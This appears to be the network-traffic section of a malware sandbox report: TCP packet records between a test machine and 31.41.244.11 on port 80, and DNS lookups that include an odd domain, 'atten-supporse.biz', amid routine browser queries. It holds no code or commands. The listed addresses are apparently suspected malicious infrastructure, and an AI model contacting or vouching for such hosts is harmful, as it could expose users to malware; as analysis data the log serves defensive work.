Dec 10, 2024 00:43:12.406553030 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.406567097 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.406578064 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.406585932 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.406589985 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.406616926 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.406641960 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.407401085 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407427073 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407439947 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407457113 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.407480955 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.407799959 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407809973 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407819986 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407830954 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407840967 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407851934 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407852888 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.407860994 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407871962 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.407874107 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.407902956 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.407913923 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.408603907 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.408615112 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.408624887 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.408662081 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.408674955 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.408688068 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.408689976 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.408699989 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.408709049 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.408721924 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.408761024 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.409584045 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.409595013 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.409604073 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.409614086 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.409622908 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.409632921 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.409637928 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.409643888 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.409653902 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.409662008 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.409677982 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.409710884 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.410427094 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.410437107 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.410445929 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.410459042 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.410474062 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.410482883 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.410484076 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.410495043 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.410501957 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.410506964 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.410531044 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.410552025 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.411381960 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.411392927 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.411401033 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.411411047 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.411418915 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.411429882 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.411443949 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.411462069 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.456911087 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.456974030 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.457000017 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.457041979 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.457427025 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.457473040 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.457498074 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.457540035 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.458540916 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.458590031 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.458642960 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.458686113 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.459659100 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.459703922 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.459758997 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.459804058 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.506970882 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.507045031 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.507071972 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.507116079 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.507494926 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.507544994 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.507673025 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.507721901 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.508620024 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.508667946 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.508744001 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.508789062 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.509730101 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.509774923 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.509841919 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.509886026 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.510824919 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.510874987 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.511042118 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.511087894 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.511926889 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.511974096 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.511987925 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.512031078 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.513076067 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.513117075 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.513178110 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.513225079 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.514122009 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.514168024 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.514246941 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.514296055 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.515248060 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.515290022 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.515328884 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.515374899 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.516386986 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.516433001 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.516577005 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.516623974 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.517530918 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.517585039 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.517616034 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.517666101 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.518610954 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.518661022 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.518707037 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.518754005 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.519731998 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.519803047 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.520157099 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.520759106 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.520804882 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.520900011 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.520945072 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.521853924 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.521903992 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.521975994 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.522022009 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.522980928 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.523020983 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.523078918 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.523123026 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.524080992 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.524118900 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.524197102 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.524240017 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.525265932 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.525312901 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.525393963 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.525437117 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.526290894 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.526338100 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.526406050 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.526457071 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.527420044 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.527467012 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.527538061 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.527575016 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.528536081 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.528587103 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.528621912 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.528736115 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.529616117 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.529663086 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.529743910 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.529786110 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.530702114 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.530766964 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.530827999 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.530873060 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.531797886 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.531842947 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.531938076 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.531980991 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.532860994 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.532905102 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.532931089 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.532973051 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.533823013 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.533868074 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.533900023 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.533945084 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.534805059 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.534848928 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.534888029 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.534926891 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.535693884 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.535741091 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.535756111 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.535797119 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.536571026 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.536613941 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.536705971 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.536750078 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.537477016 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.537519932 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.537548065 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.537594080 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.538357973 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.538399935 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.538508892 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.538552999 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.550405979 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.550453901 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.550481081 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.550494909 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.550520897 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.550542116 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.550755978 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.550765991 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.550776005 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.550786972 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.550801992 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.550828934 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.551146984 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.551208973 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.551234961 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.551249981 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.551259995 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.551268101 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.551270008 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.551280975 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.551287889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.551290989 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.551306009 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.551328897 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.552124977 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552134991 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552145004 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552155018 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552164078 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.552164078 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552175045 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552186012 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552191019 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.552218914 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.552850962 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552860975 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552870035 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552880049 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552889109 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.552891970 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.552908897 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.552930117 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.553411961 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.553421974 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.553431034 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.553441048 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.553453922 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.553464890 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.553493977 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.553860903 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.553872108 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.553924084 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.554059982 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.554074049 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.554116011 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.554383993 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.554421902 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.554552078 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.554599047 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.555232048 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.555291891 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.649125099 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.649177074 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.649219990 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.649262905 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.649566889 CET	80	49790	31.41.244.11	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 00:42:09.583515882 CET	192.168.2.4	1.1.1.1	0xfe57	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:42:09.583672047 CET	192.168.2.4	1.1.1.1	0x80da	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 10, 2024 00:42:16.333805084 CET	192.168.2.4	1.1.1.1	0x9a67	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 10, 2024 00:42:16.333805084 CET	192.168.2.4	1.1.1.1	0x1b73	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:32.842406034 CET	192.168.2.4	1.1.1.1	0x1234	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:55.332634926 CET	192.168.2.4	1.1.1.1	0xd4aa	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:55.657339096 CET	192.168.2.4	1.1.1.1	0x18c4	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:43:59.982758045 CET	192.168.2.4	1.1.1.1	0xfd55	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:59.982758045 CET	192.168.2.4	1.1.1.1	0x26e9	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:01.337027073 CET	192.168.2.4	1.1.1.1	0xac90	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:01.337347984 CET	192.168.2.4	1.1.1.1	0x8254	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:01.477020025 CET	192.168.2.4	1.1.1.1	0xa5ba	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 10, 2024 00:44:01.477092028 CET	192.168.2.4	1.1.1.1	0x7340	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:44:02.341624022 CET	192.168.2.4	1.1.1.1	0xb9a5	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.460753918 CET	192.168.2.4	1.1.1.1	0xc7e2	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.496932983 CET	192.168.2.4	1.1.1.1	0xb696	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.617317915 CET	192.168.2.4	1.1.1.1	0x8381	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.685857058 CET	192.168.2.4	1.1.1.1	0x51db	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 00:44:02.726588964 CET	192.168.2.4	1.1.1.1	0xf94e	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.727699995 CET	192.168.2.4	1.1.1.1	0xb428	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.774250031 CET	192.168.2.4	1.1.1.1	0x4561	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:44:02.829301119 CET	192.168.2.4	1.1.1.1	0x28a8	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.879703999 CET	192.168.2.4	1.1.1.1	0x9cd5	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:03.021312952 CET	192.168.2.4	1.1.1.1	0xd049	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:44:03.058109999 CET	192.168.2.4	1.1.1.1	0x1be5	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:44:06.958409071 CET	192.168.2.4	1.1.1.1	0xa544	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:06.958611012 CET	192.168.2.4	1.1.1.1	0x6fed	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:09.957556009 CET	192.168.2.4	1.1.1.1	0xd752	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:19.547589064 CET	192.168.2.4	1.1.1.1	0x865b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:19.547749996 CET	192.168.2.4	1.1.1.1	0x3b45	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 10, 2024 00:44:23.456141949 CET	192.168.2.4	1.1.1.1	0x859b	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:23.456341028 CET	192.168.2.4	1.1.1.1	0xa28a	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Dec 10, 2024 00:44:26.132152081 CET	192.168.2.4	1.1.1.1	0xac0d	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:26.132288933 CET	192.168.2.4	1.1.1.1	0xd81b	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false
Dec 10, 2024 00:44:35.219630003 CET	192.168.2.4	1.1.1.1	0x6926	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:44:35.422204971 CET	192.168.2.4	1.1.1.1	0x6d32	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
